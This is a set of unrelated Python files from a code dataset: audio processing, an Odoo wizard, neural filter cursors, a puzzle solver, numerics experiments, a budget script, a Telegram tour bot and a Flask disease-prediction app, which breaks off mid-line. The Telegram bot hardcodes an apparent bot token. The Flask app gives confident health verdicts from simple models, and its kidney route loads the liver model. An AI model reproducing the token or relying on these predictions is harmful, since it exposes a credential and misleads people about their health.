np.savetxt('{}{}'.format(filepath, '_carbonate_fft_out'), fft_result)\n fft_result = reshape_fft(nps, fft_result)\n tt, x = istft(fft_result,\n fs=sr,\n window='hamming',\n nperseg=nps,\n noverlap=int(nps * overlap),\n nfft = nfft)\n outname = filepath.split('.')[0] + '_carbonate_out.wav'\n print('writing soundfile')\n soundfile.write(outname, x, sr)\n","sub_path":"evaluate_results_carbonate.py","file_name":"evaluate_results_carbonate.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"240108784","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, api, fields, _\nfrom odoo.exceptions import UserError\n\n\nclass PurchaseRequestCreate(models.TransientModel):\n _name = \"purchase.request.create\"\n _description = \"Create PR from selected RPB Line\"\n\n @api.multi\n def purchase_request_create(self):\n context = dict(self._context or {})\n active_ids = context.get('active_ids', []) or []\n\n # Create Purchase Request\n request_id = self.env['pwk.purchase.request'].create({\n 'pr_type': 'Bahan Baku',\n 'formula_type': 'PCS',\n 'date': fields.Date.today()\n })\n\n # Create Purchase Request Line\n for record in self.env['pwk.rpb.line'].browse(active_ids):\n lem_ids = self.env['pwk.rpb.lem'].search([\n ('rpb_line_id', '=', record.id)\n ])\n\n if lem_ids:\n for lem in lem_ids:\n self.env['pwk.purchase.request.line'].create({\n 'reference': request_id.id,\n 'product_id': lem.product_id.id,\n 'account_id': lem.product_id.categ_id.property_account_expense_categ_id.id,\n 'sheet': lem.qty,\n 'quantity': lem.qty,\n 'product_uom_id': lem.product_id.uom_id.id,\n })\n\n form_view_id = self.env.ref(\"v12_pwk.pwk_purchase_request_form\").id\n return {\n 'type': 'ir.actions.act_window',\n 'name': 'Purchase Request',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'pwk.purchase.request',\n 'res_id': request_id.id,\n 'views': [(form_view_id, 'form')],\n 'target': 'current',\n }\n","sub_path":"v12_pwk/wizard/create_purchase_request_lem.py","file_name":"create_purchase_request_lem.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"245842770","text":"from .movie import Movie\nimport numpy as np\nfrom .linearfilter import SpatioTemporalFilter\nfrom .spatialfilter import GaussianSpatialFilter\nfrom .temporalfilter import TemporalFilterCosineBump\nfrom .utilities import convert_tmin_tmax_framerate_to_trange\nimport matplotlib.pyplot as plt\nfrom .kernel import Kernel3D\nimport scipy.signal as spsig\nimport time\n\nclass KernelCursor(object):\n\n \n def __init__(self, kernel, movie):\n \n self.movie = movie\n self.kernel = kernel\n self.cache = {}\n\n # print self.kernel.t_range.min(), self.kernel.t_range.max(), type(kernel), len(self.kernel)\n \n # This ensures that the kernel frame rate matches the movie frame rate:\n np.testing.assert_almost_equal(np.diff(self.kernel.t_range), np.ones_like(self.kernel.t_range[1:])*(1./movie.frame_rate))\n \n @property\n def row_range(self):\n return self.movie.row_range\n \n @property\n def col_range(self):\n return self.movie.col_range\n \n @property\n def t_range(self):\n return self.movie.t_range\n \n @property\n def frame_rate(self):\n return self.movie.frame_rate\n \n def evaluate(self, t_min=None, t_max=None, downsample=1):#:#, show=True, ax=None, plot=False, save_file_name=None, plotstyle='b-'):\n\n\n # print 'EVALUATE'\n if t_max is None:\n t_max = self.t_range[-1]\n \n if t_min is None:\n t_min = self.t_range[0]\n \n t_range = convert_tmin_tmax_framerate_to_trange(t_min, t_max, self.movie.frame_rate)[::int(downsample)]\n y_vals = np.array([self(t) for t in t_range])\n\n return t_range, y_vals \n \n def __call__(self, t):\n \n\n \n if t < self.t_range[0] or t > self.t_range[-1]:\n curr_rate = 0\n else:\n# print 'zero'\n \n ti = t*self.frame_rate\n til, tir = int(np.floor(ti)), int(np.ceil(ti))\n \n tl, tr = float(til)/self.frame_rate, float(tir)/self.frame_rate\n if np.abs(tl-t)<1e-12:\n curr_rate = self.apply_dot_product(til)\n # print 'a'\n \n elif np.abs(tr-t)<1e-12:\n curr_rate = self.apply_dot_product(tir)\n # print 'b'\n else:\n wa, wb = (1-(t-tl)/(tr-tl)), (1-(tr-t)/(tr-tl))\n cl = self.apply_dot_product(til)\n cr = self.apply_dot_product(tir) \n curr_rate = cl*wa+cr*wb\n # print 'c'\n \n if np.isnan(curr_rate):\n assert RuntimeError\n \n return curr_rate\n\n def apply_dot_product(self, ti_offset):\n \n try:\n return self.cache[ti_offset]\n \n except KeyError:\n t_inds = self.kernel.t_inds + ti_offset + 1 # Offset by one nhc 14 Apr '17\n min_ind, max_ind = 0, self.movie.data.shape[0]\n allowed_inds = np.where(np.logical_and(min_ind <= t_inds, t_inds < max_ind))\n t_inds = t_inds[allowed_inds]\n row_inds = self.kernel.row_inds[allowed_inds]\n col_inds = self.kernel.col_inds[allowed_inds]\n kernel_vector = self.kernel.kernel[allowed_inds] \n result = np.dot(self.movie[t_inds, row_inds, col_inds],kernel_vector)\n self.cache[ti_offset ] = result\n return result\n \nclass FilterCursor(KernelCursor):\n\n def __init__(self, spatiotemporal_filter, movie, threshold=0):\n \n self.spatiotemporal_filter = spatiotemporal_filter\n kernel = self.spatiotemporal_filter.get_spatiotemporal_kernel(movie.row_range, movie.col_range, t_range=movie.t_range, threshold=threshold, reverse=True)\n\n super(FilterCursor, self).__init__(kernel, movie)\n \nclass LNUnitCursor(KernelCursor):\n \n def __init__(self, lnunit, movie, threshold=0):\n\n # print 'LNUnitCursor'\n \n self.lnunit = lnunit\n\n kernel = lnunit.get_spatiotemporal_kernel(movie.row_range, movie.col_range, movie.t_range, reverse=True, threshold=threshold)\n\n kernel.apply_threshold(threshold)\n \n super(LNUnitCursor, self).__init__(kernel, movie)\n \n def __call__(self, t):\n return self.lnunit.transfer_function(super(LNUnitCursor, self).__call__(t))\n \nclass MultiLNUnitCursor(object):\n \n def __init__(self, multi_lnunit, movie, threshold=0):\n\n self.multi_lnunit = multi_lnunit\n self.lnunit_cursor_list = [LNUnitCursor(lnunit, movie, threshold=threshold) for lnunit in multi_lnunit.lnunit_list]\n self.movie = movie\n \n def evaluate(self, **kwargs):\n\n# print len(self.lnunit_cursor_list)\n# for ii, x in enumerate(self.lnunit_cursor_list):\n# \n# print ii, self.multi_lnunit, self.multi_lnunit.transfer_function, x\n# print ii, x.evaluate(**kwargs), kwargs\n# print 'done'\n# # print lnunit, movie, curr_cursor\n\n\n\n multi_e = [unit_cursor.evaluate(**kwargs) for unit_cursor in self.lnunit_cursor_list]\n t_list, y_list = zip(*multi_e)\n \n# plt.figure()\n# plt.plot(t_list[0],y_list[0])\n# plt.plot(t_list[0],y_list[1],'r')\n# plt.show()\n \n #sys.exit()\n\n# print len(y_list)\n\n return t_list[0], self.multi_lnunit.transfer_function(*y_list)\n \nclass MultiLNUnitMultiMovieCursor(MultiLNUnitCursor):\n \n def __init__(self, multi_lnunit, movie_list, threshold=0.):\n\n assert len(multi_lnunit.lnunit_list) == len(movie_list)\n \n self.multi_lnunit = multi_lnunit\n self.lnunit_movie_list = movie_list\n self.lnunit_cursor_list = [lnunit.get_cursor(movie, threshold=threshold) for lnunit, movie in zip(multi_lnunit.lnunit_list, movie_list)]\n# for lnunit, movie, curr_cursor in zip(multi_lnunit.lnunit_list, movie_list, self.lnunit_cursor_list):\n# print lnunit, movie, curr_cursor\n\nclass SeparableKernelCursor(object):\n\n def __init__(self, spatial_kernel, temporal_kernel, movie):\n '''Assumes temporal kernel is not reversed'''\n\n self.movie = movie\n self.spatial_kernel = spatial_kernel\n self.temporal_kernel = temporal_kernel\n\n def evaluate(self, threshold=0):\n\n full_spatial_kernel = np.array([self.spatial_kernel.full()])\n full_temporal_kernel = self.temporal_kernel.full()\n\n nonzero_inds = np.where(np.abs(full_spatial_kernel[0,:,:])>=threshold)\n rm, rM = nonzero_inds[0].min(), nonzero_inds[0].max()\n cm, cM = nonzero_inds[1].min(), nonzero_inds[1].max()\n\n convolution_answer_sep_spatial = (self.movie.data[:,rm:rM+1, cm:cM+1] * full_spatial_kernel[:,rm:rM+1, cm:cM+1]).sum(axis=1).sum(axis=1)\n sig_tmp = np.zeros(len(full_temporal_kernel) + len(convolution_answer_sep_spatial) - 1)\n sig_tmp[len(full_temporal_kernel)-1:] = convolution_answer_sep_spatial\n convolution_answer_sep = spsig.convolve(sig_tmp, full_temporal_kernel[::-1], mode='valid')\n t = np.arange(len(convolution_answer_sep))/self.movie.frame_rate\n return t, convolution_answer_sep\n\n\nclass SeparableSpatioTemporalFilterCursor(SeparableKernelCursor):\n\n def __init__(self, spatiotemporal_filter, movie):\n\n self.spatial_filter = spatiotemporal_filter.spatial_filter\n self.temporal_filter = spatiotemporal_filter.temporal_filter\n\n spatial_kernel = self.spatial_filter.get_kernel(movie.row_range, movie.col_range, threshold=-1)\n temporal_kernel = self.temporal_filter.get_kernel(t_range=movie.t_range, threshold=0, reverse=True)\n spatial_kernel.kernel *= spatiotemporal_filter.amplitude\n\n super(SeparableSpatioTemporalFilterCursor, self).__init__(spatial_kernel,\n temporal_kernel,\n movie)\n\n\nclass SeparableLNUnitCursor(SeparableSpatioTemporalFilterCursor):\n def __init__(self, lnunit, movie):\n self.lnunit = lnunit\n\n super(SeparableLNUnitCursor, self).__init__(self.lnunit.linear_filter, movie)\n\n def evaluate(self, downsample = 1):\n\n assert downsample == 1\n\n t, y = super(SeparableLNUnitCursor, self).evaluate()\n\n return t, [self.lnunit.transfer_function(yi) for yi in y]\n\nclass SeparableMultiLNUnitCursor(object):\n\n def __init__(self, multilnunit, movie):\n\n self.multilnunit = multilnunit\n\n self.lnunit_cursor_list = []\n for lnunit in self.multilnunit.lnunit_list:\n self.lnunit_cursor_list.append(SeparableLNUnitCursor(lnunit, movie))\n\n def evaluate(self, *args, **kwargs):\n\n assert kwargs.get('downsample', 1) == 1\n\n y_list = []\n for cursor in self.lnunit_cursor_list:\n t, y = cursor.evaluate(*args, **kwargs)\n y_list.append(y)\n\n return t, self.multilnunit.transfer_function(*y_list)\n \n# if __name__ == \"__main__\":\n# spatial_filter_1 = GaussianSpatialFilter(sigma=(2.,2.), amplitude=10)\n# temporal_filter = TemporalFilterCosineBump((.4,-.3), (40,80))\n# curr_filter = SpatioTemporalFilter(spatial_filter_1, temporal_filter)\n#\n# movie_file = '/data/mat/iSee_temp_shared/movies/TouchOfEvil.npy'\n# m_data = np.load(movie_file, 'r')\n# movie = Movie(m_data[:,:,:], frame_rate=30.)\n# cursor = FilterCursor(curr_filter, movie, threshold=-1)\n# cursor.evaluate()\n \n ","sub_path":"bmtk/simulator/filternet/lgnmodel/cursor.py","file_name":"cursor.py","file_ext":"py","file_size_in_byte":9527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"505458383","text":"#!/usr/bin/env python3\n\n\nimport sys\n\ndef parse_input(rawtext):\n lines = rawtext.split('\\n')\n plants = lines[0][15:]\n plants = plants.replace('.', '0')\n plants = plants.replace('#', '1')\n plants = tuple(int(val) for val in plants)\n\n cases = dict()\n for line in lines[2:]:\n if line:\n line = line.replace('.', '0')\n line = line.replace('#', '1')\n cases[tuple(int(val) for val in line[:5])] = int(line[9])\n return plants, cases\n\n\ndef plantstep(plants, cases, modifier=0):\n left = []\n if plants[:4] != [0]*4:\n inc = len(plants)//8\n left += [0]*inc\n modifier -= inc\n right = []\n if plants[-4:] != [0]*4:\n right = [0]*4\n new_plants = left+list(plants)+right\n plants = tuple(new_plants)\n\n for i in range(plants.index(1)-3, len(plants)-1):\n present = plants[i-2:i+3]\n\n if present in cases:\n new_plants[i] = cases[present]\n else:\n new_plants[i] = 0\n return new_plants, modifier\n\n\ndef potsum(plants, modifier):\n sum_pots = 0\n for i in range(len(plants)):\n if plants[i]:\n sum_pots += i+modifier\n return sum_pots\n\n\ndef plants_to_str(plants):\n txt = ''.join([str(val) for val in plants])\n txt = txt.replace('0', '.')\n txt = txt.replace('1', '#')\n return txt\n\n\ndef test_plantstep():\n rawtext = '''initial state: #..#.#..##......###...###\n\n...## => #\n..#.. => #\n.#... => #\n.#.#. => #\n.#.## => #\n.##.. => #\n.#### => #\n#.#.# => #\n#.### => #\n##.#. => #\n##.## => #\n###.. => #\n###.# => #\n####. => #'''\n\n plants, cases = parse_input(rawtext)\n\n assert plants_to_str(plants) == '#..#.#..##......###...###'\n plants, modifier = plantstep(plants, cases)\n assert plants_to_str(plants).strip('.') == '#...#....#.....#..#..#..#'\n for i in range(19):\n plants, modifier = plantstep(plants, cases, modifier)\n assert plants_to_str(plants).strip('.') == '#....##....#####...#######....#.#..##'\n\n assert potsum(plants, modifier) == 325\n\n\ndef main():\n rawtext = open(sys.argv[1]).read()\n plants, cases = parse_input(rawtext)\n modifier = 0\n # observation: increase seems to stabilise after a while\n diff = 0\n oldsum = 0\n for i in range(20000):\n plants, modifier = plantstep(plants, cases, modifier)\n newsum = potsum(plants, modifier)\n if newsum-oldsum == diff:\n print(newsum+diff*(50000000000-i-1))\n break\n diff = newsum-oldsum\n oldsum = newsum\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"12_plants2.py","file_name":"12_plants2.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180252814","text":"import unittest\nimport HTMLTestRunner\nfrom Mj_API import front_api\nfrom Mj_API import web_api_1\ninfo = {}\n\n\nclass Mj_web_api(unittest.TestCase):\n\n def setUp(self):\n print('开始执行')\n\n def test_web_login(self):\n '''web登录接口'''\n r = web_api_1.Web_api_common()\n r = r.web_login().status_code\n self.assertEquals(r, 200)\n\n def tearDown(self):\n print('结束')\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Mj_API/run_case.py","file_name":"run_case.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"189180340","text":"######################################################################################\n# Roberts advection test for IMEX sdc in Paralpha with just an explicit part and Euler\n# no spatial variables here, just time\n######################################################################################\n\nimport numpy as np\n\n\n# Paralpha settings\nN = int(1e03) # spatial points\ndt = 1e-03\nTend = 1e-02\nL = int(Tend / dt)\n\nalpha = 1e-01\nK = 5 # maxiter\n\n# equation settings\nT1 = 0\nT2 = L * dt + T1\nX1 = 0\nX2 = 1\nc = 1\nx = np.linspace(X1, X2, N + 2)[1:-1]\ndx = x[1] - x[0]\nt = np.linspace(T1, T2, L + 1)[1:]\n\nprint(f'CFL: {c*dt/dx}')\n\nprint('solving on [{}, {}] x [{}, {}]'.format(T1, T2, X1, X2))\n\n# functions\nA = 1 / (1 * dx) * (-np.eye(k=-1, N=N) + np.eye(k=0, N=N))\nA[0, -1] = -1 / (1 * dx)\n# A = 1/(2 * dx) * (-np.eye(k=-1, N=N) + np.eye(k=1, N=N))\n# A[0, -1] = -1/(2 * dx)\n# A[-1, 0] = 1/(2 * dx)\n\n\ndef u_exact(t, x):\n return np.sin(2 * np.pi * (x - c * t))\n\n\ndef f_exp(t, x, u):\n y = -c * A @ u\n return y\n\n\n# the rest\nu0 = u_exact(T1, x)\n\n# explicit euler\nus = u0.copy()\nfor l in range(L):\n us = us + dt * f_exp(t[l] - dt, x, us)\n\nerr_euler = np.linalg.norm((us - u_exact(T2, x)).flatten(), np.inf)\nprint('seq err = ', err_euler)\n\nEa = np.eye(k=-1, N=L) # + alpha * np.eye(k=-1, N=L)\nEa[0, -1] = alpha\n\nprint(sum([np.linalg.matrix_power(Ea, l) for l in range(10)]))\n\nprint(np.linalg.norm(np.linalg.inv(Ea), np.inf))\nexit()\n\nprint(np.linalg.norm(np.eye(k=-1, N=L) + Ea, np.inf))\n\n\nu = np.zeros(N * L, dtype=complex)\n\n# for l in range(L):\n# u[l * N: (l + 1) * N] = u0\n\nu[:N] = u0\n\nrhs = np.empty(N * L, dtype=complex)\n\nd, S = np.linalg.eig(Ea)\nSinv = np.linalg.inv(S) # S @ d @ Sinv = Ea\n\nprint(f'Diagonalization error: {np.linalg.norm(S @ np.diag(d) @ Sinv - Ea, np.inf)}')\n# exit()\nerr = np.linalg.norm(u[-N:] - u_exact(T2, x), np.inf)\nprint(err, 0)\n\nfor k in range(K):\n rhs[:N] = u0 - alpha * u[-N:] + dt * f_exp(t[0] - dt, x, u[:N])\n for l in range(1, L, 1):\n rhs[l * N : (l + 1) * N] = dt * f_exp(t[l] - dt, x, u[(l - 1) * N : l * N]) - alpha * u[(l - 1) * N : l * N]\n\n # u = np.kron(Sinv, np.eye(N)) @ rhs\n for i in range(L):\n temp = np.zeros(N, dtype=complex)\n for j in range(L):\n temp += Sinv[i, j] * rhs[j * N : (j + 1) * N]\n u[i * N : (i + 1) * N] = temp.copy()\n\n # solve diagonal systems\n for l in range(L):\n u[l * N : (l + 1) * N] /= 1 + d[l]\n\n # u = np.kron(S, np.eye(N)) @ u\n u1 = u.copy()\n for i in range(L):\n temp = np.zeros(N, dtype=complex)\n for j in range(L):\n temp += S[i, j] * u1[j * N : (j + 1) * N]\n u[i * N : (i + 1) * N] = temp.copy()\n\n err_paralpha = np.linalg.norm((u[-N:] - u_exact(T2, x)).flatten(), np.inf)\n print(err_paralpha, k + 1)\n if err_euler > err_paralpha:\n break\n\n\nerr = np.linalg.norm((us - u[-N:]).flatten(), np.inf)\nprint('error between seq and paralpha = ', err)\n\n# gc. collect()\n","sub_path":"pySDC/playgrounds/paralpha/explicit.py","file_name":"explicit.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"586189791","text":"import csv\nimport os\n\n# CSV path\nbudget_data_csv = os.path.join(\"/Users/mackenzieswaney/pybank/\", 'budget_data.csv')\n\n# Total months output/ tracking\ntotal_months = 0\n\n# Create lists\nmonths = []\nnet = []\nchanges = []\n\n# Read CSV\nwith open(budget_data_csv, newline='') as csvfile:\n bankreader = csv.reader(csvfile, delimiter=\",\")\n\n # Read header row\n csv_header = next(csvfile)\n\n# Loop through CSV - count months & total rev\n for row in bankreader:\n total_months = total_months + 1\n net.append(int(row[1]))\n prev = total_months - 1\n change = int(row[1]) - net[(prev-1)]\n changes.append(change)\n months.append(str(row[0]))\n \n# Define variables\ntotal = sum(net)\naverage_change = round(sum(changes)/(len(changes)-1), 2)\nmax_val = max(changes)\nmin_val = min(changes)\nmax_ind = changes.index(max_val)\nmin_ind = changes.index(min_val)\nmax_month = months[max_ind]\nmin_month = months[min_ind]\n\n# Print to terminal\nprint(\"Financial Analysis\")\nprint(\"-------------------------\")\nprint(f'Total Months: {total_months}')\nprint(f'Total: ${total}')\nprint(f'Average Change: #{average_change}')\nprint(f'Greatest Increase in Profits: {max_month} (${max_val})')\nprint(f'Greatest Decrease in Profits: {min_month} (${min_val})')\n\n# Print to txt file\ntextfile = open(\"pybankmackenzie.txt\", \"w\")\n\ntextfile.write(\"Financial Analysis\\n\")\ntextfile.write(\"-------------------------\\n\")\ntextfile.write(f'Total Months: {total_months}\\n')\ntextfile.write(f'Total: ${total}\\n')\ntextfile.write(f'Average Change: ${average_change}\\n')\ntextfile.write(f'Greatest Increase in Profits: {max_month} (${max_val})\\n')\ntextfile.write(f'Greatest Decrease in Profits: {min_month} (${min_val})')","sub_path":"pbmain.py","file_name":"pbmain.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"615782637","text":"# -*- coding: utf-8 -*-\nimport random\nimport telebot\nbot = telebot.TeleBot('1201165565:AAElTl8352APspMEaZcQhjTQXqDkPdoxq9A')\nfrom telebot import types\nimport dictionaries\n\nspb_way1_text = dictionaries.spb_way1_text\nspb_way1_img = dictionaries.spb_way1_img\nurl = \"https://raw.githubusercontent.com/ChKtn/BySteps/master/\"\nurl_p1 = \"img_way1_saint_peterburg/\"\ni = 0\ng = 0\nlen = 12\nspb_way2_text = dictionaries.spb_way2_text\nspb_way2_img = dictionaries.spb_way2_img\nlen = dictionaries.spb_way2_len\nurl_p2 = \"img_way2_saint_peterburg/\"\n\n\n@bot.message_handler(commands=[\"start\"])\ndef start(message):\n bot.send_message(message.from_user.id, \"Привет\") # Готовим кнопки\n # По очереди готовим текст и обработчик для каждого знака зодиака\n keyboard = types.InlineKeyboardMarkup()\n key_spb = types.InlineKeyboardButton(text='Санкт-Петербург', callback_data='spb')\n # И добавляем кнопку на экран\n keyboard.add(key_spb)\n key_kazan = types.InlineKeyboardButton(text='Казань', callback_data='kazan')\n keyboard.add(key_kazan)\n # Показываем все кнопки сразу и пишем сообщен��е о выборе\n bot.send_message(message.from_user.id, text='Выбери город в котором хочешь погулять', reply_markup=keyboard)\n\n # Обработчик нажатий на кнопки\n@bot.callback_query_handler(func=lambda call: call.data == \"spb\")\ndef callback_worker_spb(call):\n bot.send_message(call.message.chat.id, \"Санкт-Петербург! Культурная столица России)\")\n keyboard_spb = types.InlineKeyboardMarkup()\n key_spb_w1 = types.InlineKeyboardButton(text='Средний маршрут (~1ч)', callback_data='spb_w1')\n keyboard_spb.add(key_spb_w1)\n key_spb_w2 = types.InlineKeyboardButton(text='Тематический маршрут \"Пушкинский Петербург\" (~2ч)', callback_data='spb_w2')\n keyboard_spb.add(key_spb_w2)\n bot.send_message(call.from_user.id, text='Выбери маршрут', reply_markup=keyboard_spb)\n\n@bot.callback_query_handler(func=lambda call: call.data == \"spb_w1\" )\ndef callback_worker_spb_w1(call):\n bot.send_message(call.message.chat.id, \"Средний маршрут\")\n keyboard = types.InlineKeyboardMarkup()\n k_w1 = types.InlineKeyboardButton(text='Начинаем!', callback_data=\"next_place1\")\n keyboard.add(k_w1)\n bot.send_photo(call.from_user.id, url+url_p1+spb_way1_img[0], spb_way1_text[0], reply_markup=keyboard)\n\n@bot.callback_query_handler(func=lambda call: call.data == \"spb_w2\")\ndef callback_worker_spb_w2(call):\n bot.send_message(call.message.chat.id, \"Тематический маршрут Пушкинский Петербург\")\n keyboard = types.InlineKeyboardMarkup()\n key_w1 = types.InlineKeyboardButton(text='Начинаем!', callback_data=\"next_place2\")\n keyboard.add(key_w1)\n bot.send_photo(call.from_user.id, url + url_p2 + spb_way2_img[0], spb_way2_text[0], reply_markup=keyboard)\n\n@bot.callback_query_handler(func=lambda call: call.data==\"next_place1\")\ndef next_place1(call):\n global i\n i += 1\n if i == len:\n bot.send_photo(call.from_user.id, url + url_p1 + spb_way1_img[i], spb_way1_text[i])\n bot.send_message(call.message.chat.id, \"На этом наше путешествие подходит к концу. Возвращайся скорее и исследуй новые маршруты :)\\n\\nЧто бы попробовать новые маршруты, используй /start\")\n i = 0\n start(call.message)\n elif i >= len:\n i = 0\n start(call.message)\n else:\n keyboard_spb = types.InlineKeyboardMarkup()\n key_w1 = types.InlineKeyboardButton(text='Следующее место', callback_data=\"next_place1\")\n keyboard_spb.add(key_w1)\n key_w2 = types.InlineKeyboardButton(text='Показать карту', callback_data=\"spb_w1\")\n keyboard_spb.add(key_w2)\n bot.send_photo(call.from_user.id, url + url_p1 + spb_way1_img[i], spb_way1_text[i], reply_markup=keyboard_spb)\n\n@bot.callback_query_handler(func=lambda call: call.data==\"next_place2\")\ndef next_place2(call):\n global g\n g += 1\n if g == len:\n bot.send_photo(call.from_user.id, url+ url_p2+ spb_way2_img[g], spb_way2_text[g])\n bot.send_message(call.message.chat.id, \"На этом наше путешествие подходит к концу. Возвращайся скорее и исследуй новые маршруты :)\\n\\nЧто бы попробовать новые маршруты, используй /start\")\n g=0\n start(call.message)\n elif g >= len:\n g = 0\n start(call.message)\n else:\n keyboard_spb = types.InlineKeyboardMarkup()\n key_w1 = types.InlineKeyboardButton(text='Следующее место', callback_data=\"next_place2\")\n keyboard_spb.add(key_w1)\n key_w2 = types.InlineKeyboardButton(text='Показать карту', callback_data=\"spb_w2\")\n keyboard_spb.add(key_w2)\n bot.send_photo(call.from_user.id, url +url_p2+ spb_way2_img[g], spb_way2_text[g], reply_markup=keyboard_spb)\n\n@bot.callback_query_handler(func=lambda call: call.data == \"kazan\")\ndef callback_worker_kazan(call):\n bot.send_message(call.message.chat.id, \"Этот город мы скоро загрузим, а пока можешь прогуляться по другому городу. Используй /start\")\n\n@bot.message_handler(content_types=['text'])\ndef all_messages(msg):\n start(msg)\nif __name__ == '__main__':\n bot.polling(none_stop=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"122224144","text":"from flask import Flask, render_template, url_for, flash, redirect\nimport joblib\nfrom flask import request\nimport numpy as np\n\napp = Flask(__name__, template_folder='templates')\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/Heart\")\ndef heart():\n return render_template(\"heart.html\")\n\n@app.route(\"/Diabetes\")\ndef diabetes():\n return render_template(\"diabetes.html\")\n\n@app.route(\"/Liver\")\ndef liver():\n return render_template(\"liver.html\")\n\n@app.route(\"/Kidney\")\ndef kidney():\n return render_template(\"kidney.html\")\n\n@app.route(\"/BreastCancer\")\ndef breastCancer():\n return render_template(\"cancer.html\")\n\n\n\ndef ValuePredictorDia(to_predict_list_dia, size):\n to_predictDia = np.array(to_predict_list_dia).reshape(1,size)\n if(size==6):\n loaded_model_dia = joblib.load('diabetes_model.pkl')\n resultDia = loaded_model_dia.predict(to_predictDia)\n return resultDia[0]\n \n\ndef ValuePredictorHeart(to_predict_list_heart, size):\n to_predictHeart = np.array(to_predict_list_heart).reshape(1,size)\n if(size==7):\n loaded_model_heart = joblib.load('heart_model.pkl')\n resultHeart = loaded_model_heart.predict(to_predictHeart)\n return resultHeart[0]\n\n\ndef ValuePredictorLiver(to_predict_list_liver, size):\n to_predictLiver = np.array(to_predict_list_liver).reshape(1,size)\n if(size==7):\n loaded_model_liver = joblib.load('liver_model.pkl')\n resultLiver = loaded_model_liver.predict(to_predictLiver)\n return resultLiver[0]\n\ndef ValuePredictorKidney(to_predict_list_kidney, size):\n to_predictKidney = np.array(to_predict_list_kidney).reshape(1,size)\n if(size==7):\n loaded_model_kidney = joblib.load('liver_model.pkl')\n resultKidney = loaded_model_kidney.predict(to_predictKidney)\n return resultKidney[0]\n\ndef ValuePredictorCancer(to_predict_list_cancer, size):\n to_predictCancer = np.array(to_predict_list_cancer).reshape(1,size)\n if(size==5):\n loaded_model_cancer = joblib.load('cancer_model.pkl')\n resultCancer = loaded_model_cancer.predict(to_predictCancer)\n return resultCancer[0]\n\n\n@app.route('/predictDia', methods = [\"POST\"])\ndef predictDia():\n if request.method == \"POST\":\n to_predict_list_dia = request.form.to_dict()\n to_predict_list_dia = list(to_predict_list_dia.values())\n to_predict_list_dia = list(map(float, to_predict_list_dia))\n #diabetes\n if(len(to_predict_list_dia)==6):\n resultDia = ValuePredictorDia(to_predict_list_dia,6)\n \n if(int(resultDia)==1):\n predictionDia = \"Sorry! Maybe you have chances to getting the Diabetes. Please consult the your doctor immediately\"\n else:\n predictionDia = \"Don't Worry,. You don't have any Symptoms of the Diabetes\"\n return(render_template(\"result.html\", prediction_text=predictionDia)) \n\n\n@app.route('/predictHeart', methods = [\"POST\"])\ndef predictHeart():\n if request.method == \"POST\":\n to_predict_list_heart = request.form.to_dict()\n to_predict_list_heart = list(to_predict_list_heart.values())\n to_predict_list_heart = list(map(float, to_predict_list_heart))\n #diabetes\n if(len(to_predict_list_heart)==7):\n resultHeart = ValuePredictorHeart(to_predict_list_heart,7) \n\n if(int(resultHeart)==1):\n predictionHeart = \"Sorry! Maybe you have chances to getting the Heart Diseases. Please consult the your doctor immediately\"\n else:\n predictionHeart = \"Don't Worry,. You don't have any Symptoms of the Heart Diseases\"\n return(render_template(\"result.html\", prediction_text=predictionHeart))\n\n\n@app.route('/predictLiver', methods = [\"POST\"])\ndef predictLiver():\n if request.method == \"POST\":\n to_predict_list_liver = request.form.to_dict()\n to_predict_list_liver = list(to_predict_list_liver.values())\n to_predict_list_liver = list(map(float, to_predict_list_liver))\n #diabetes\n if(len(to_predict_list_liver)==7):\n resultLiver = ValuePredictorLiver(to_predict_list_liver,7) \n\n if(int(resultLiver)==1):\n predictionLiver = \"Sorry! Maybe you have chances to getting the Liver Infections. Please consult the your doctor immediately\"\n else:\n predictionLiver =\"Don't Worry,. You don't have any Symptoms of about Liver Infections\"\n return(render_template(\"result.html\", prediction_text=predictionLiver)) \n\n@app.route('/predictKidney', methods = [\"POST\"])\ndef predictKidney():\n if request.method == \"POST\":\n to_predict_list_kidney = request.form.to_dict()\n to_predict_list_kidney = list(to_predict_list_kidney.values())\n to_predict_list_kidney = list(map(float, to_predict_list_kidney))\n #diabetes\n if(len(to_predict_list_kidney)==7):\n resultKidney = ValuePredictorKidney(to_predict_list_kidney,7) \n\n if(int(resultKidney)==1):\n predictionKidney = \"Sorry! Maybe you have chances to getting the Kidney Diseases. Please consult the your doctor immediately\"\n else:\n predictionKidney = \"Don't Worry,. You don't have any Symptoms of the Kidney Diseases\"\n return(render_template(\"result.html\", prediction_text=predictionKidney))\n\n@app.route('/predictCancer', methods = [\"POST\"])\ndef predictCancer():\n if request.method == \"POST\":\n to_predict_list_cancer = request.form.to_dict()\n to_predict_list_cancer = list(to_predict_list_cancer.values())\n to_predict_list_cancer = list(map(float, to_predict_list_cancer))\n #diabetes\n if(len(to_predict_list_cancer)==5):\n resultCancer = ValuePredictorCancer(to_predict_list_cancer,5) \n\n if(int(resultCancer)==1):\n predictionCancer = \"Sorry! Maybe you have chances to getting Breast Cancer. Please consult the your doctor immediately\"\n else:\n predictionCancer = \"Don't Worry,. You don't have any Symptoms of the Breast Cancer\"\n return(render_template(\"result.html\", 